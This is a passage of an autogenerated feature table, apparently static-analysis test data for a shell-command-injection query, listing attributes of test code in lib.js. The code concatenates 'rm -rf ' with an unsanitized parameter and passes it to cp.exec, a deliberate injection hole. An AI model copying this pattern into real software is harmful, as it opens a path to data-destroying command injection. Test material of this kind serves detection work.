contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:6:40:9 | name | enclosingFunctionBody | name cp exec rm -rf name cp exec rm -rf notASource | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:6:40:9 | name | enclosingFunctionBody | name cp exec rm -rf name cp exec rm -rf notASource | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:6:40:9 | name | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:6:40:9 | name | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:6:40:9 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:40:6:40:9 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:3:41:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:3:41:4 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:3:41:4 | cp | enclosingFunctionBody | name cp exec rm -rf name cp exec rm -rf notASource | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:3:41:4 | cp | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:3:41:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:3:41:9 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:3:41:9 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:3:41:9 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name cp exec rm -rf notASource | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:3:41:9 | cp.exec | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:3:41:9 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:3:41:27 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:3:41:27 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:3:41:27 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name cp exec rm -rf notASource | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:3:41:27 | cp.exec ... + name) | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:3:41:27 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:3:41:27 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:3:41:27 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:3:41:27 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name cp exec rm -rf notASource | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:3:41:27 | exceptional return of cp.exec ... + name) | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:3:41:27 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:6:41:9 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:6:41:9 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:6:41:9 | exec | enclosingFunctionBody | name cp exec rm -rf name cp exec rm -rf notASource | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:6:41:9 | exec | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:6:41:9 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:11:41:19 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:11:41:19 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:11:41:19 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name cp exec rm -rf notASource | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:11:41:19 | "rm -rf " | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:11:41:19 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:11:41:19 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:11:41:26 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:11:41:26 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:11:41:26 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:11:41:26 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:11:41:26 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:11:41:26 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name cp exec rm -rf notASource | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:11:41:26 | "rm -rf " + name | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:11:41:26 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:11:41:26 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:23:41:26 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:23:41:26 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:23:41:26 | name | enclosingFunctionBody | name cp exec rm -rf name cp exec rm -rf notASource | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:23:41:26 | name | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:23:41:26 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:23:41:26 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:3:43:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:3:43:4 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:3:43:4 | cp | enclosingFunctionBody | name cp exec rm -rf name cp exec rm -rf notASource | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:3:43:4 | cp | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:3:43:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:3:43:9 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:3:43:9 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:3:43:9 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name cp exec rm -rf notASource | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:3:43:9 | cp.exec | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:3:43:9 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:3:43:33 | cp.exec ... Source) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:3:43:33 | cp.exec ... Source) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:3:43:33 | cp.exec ... Source) | enclosingFunctionBody | name cp exec rm -rf name cp exec rm -rf notASource | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:3:43:33 | cp.exec ... Source) | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:3:43:33 | cp.exec ... Source) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:3:43:33 | exceptional return of cp.exec ... Source) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:3:43:33 | exceptional return of cp.exec ... Source) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:3:43:33 | exceptional return of cp.exec ... Source) | enclosingFunctionBody | name cp exec rm -rf name cp exec rm -rf notASource | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:3:43:33 | exceptional return of cp.exec ... Source) | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:3:43:33 | exceptional return of cp.exec ... Source) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:6:43:9 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:6:43:9 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:6:43:9 | exec | enclosingFunctionBody | name cp exec rm -rf name cp exec rm -rf notASource | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:6:43:9 | exec | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:6:43:9 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:11:43:19 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:11:43:19 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:11:43:19 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name cp exec rm -rf notASource | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:11:43:19 | "rm -rf " | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:11:43:19 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| 